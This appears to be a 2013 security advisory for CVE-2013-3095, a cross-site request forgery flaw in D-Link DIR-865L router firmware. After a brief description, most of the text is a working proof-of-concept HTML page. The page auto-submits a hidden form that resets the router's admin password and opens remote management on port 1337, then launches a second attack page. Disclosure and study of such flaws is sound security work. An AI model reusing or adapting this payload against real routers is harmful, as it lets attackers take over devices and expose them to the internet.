Release date: 2013-04-19
Updated: 2013-04-23
Affected systems:
D-Link DIR-865L
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59312
CVE(CAN) ID: CVE-2013-3095
The D-Link DIR-865L is an enterprise-class wireless router.
D-Link DIR-865L firmware 1.03 and other versions have a security vulnerability in the way user requests are validated: a user who browses a specially crafted web page can be made to perform certain actions through such requests, for example changing the login credentials or enabling certain services.
<*Source: Jacob Holcomb
Link:
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and educational purposes only. Use at your own risk!
Jacob Holcomb () provided the following test method:
In the following proof of concept attack, we assume that a device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the administrator's router, from the administrator's browser. Since the administrator has a current session established with the router, the form submissions are processed.
The first form (Figure 1) is pre-filled with the information required to set the administrator password to "ISE" and enable remote management on port 1337. The second form completes the action by instructing the D-Link to save the settings it has been given.
-------------------------- Figure 1. Attack page 1. --------------------------
<html>
<head>
<title> D-LINK DIR-865L CSRF</title>
<!-- Firmware Version: 1.03 Fri 02 Nov 2012 -->
</head>
<body>
<form name="dlinkXML" action="http://192.168.0.1/hedwig.cgi"
enctype="text/plain" method="post">
<input type="hidden" name="<?xml version=" value="'1.0' encoding='UTF-8'?>
<postxml>
<module>
<service>DEVICE.ACCOUNT</service>
<device>
<gw_name>DIR-865L</gw_name>
<account>
<seqno>1</seqno>
<max>2</max>
<count>1</count>
<entry>
<uid>USR-</uid>
<name>Admin</name>
<usrid/>
<password>ISE</password>
<group>0</group>
<description/>
</entry>
</account>
<group>
<seqno/>
<max/>
<count>0</count>
</group>
<session>
<captcha>0</captcha>
<dummy/>
<timeout>600</timeout>
<maxsession>128</maxsession>
<maxauthorized>16</maxauthorized>
</session>
</device>
</module>
<module>
<service>HTTP.WAN-1</service>
<inf>
<web>1337</web>
<https_rport></https_rport>
<stunnel>1</stunnel>
<weballow>
<hostv4ip/>
</weballow>
<inbfilter></inbfilter>
</inf>
</module>
<module>
<service>HTTP.WAN-2</service>
<inf>
<web>1337</web>
<weballow></weballow>
</inf>
</module>
<module>
<service>INBFILTER</service>
<acl>
<inbfilter>
<seqno>1</seqno>
<max>24</max>
<count>0</count>
</inbfilter>
</acl>
<ACTIVATE>ignore</ACTIVATE>
<FATLADY>ignore</FATLADY>
<SETCFG>ignore</SETCFG>
</module>
<module>
<service>SHAREPORT</service>
<FATLADY>ignore</FATLADY>
<ACTIVATE>ignore</ACTIVATE>
</module>
</postxml>">
</form>
<script>
function CSRF1() { document.dlinkXML.submit(); }
window.setTimeout(CSRF1, 1000);
function CSRF2() { window.open("http://192.168.0.100/dlinkCSRF2.html"); }
window.setTimeout(CSRF2, 1000);
</script>
</body>
</html>
-------------------------- Figure 1. Attack page 1. --------------------------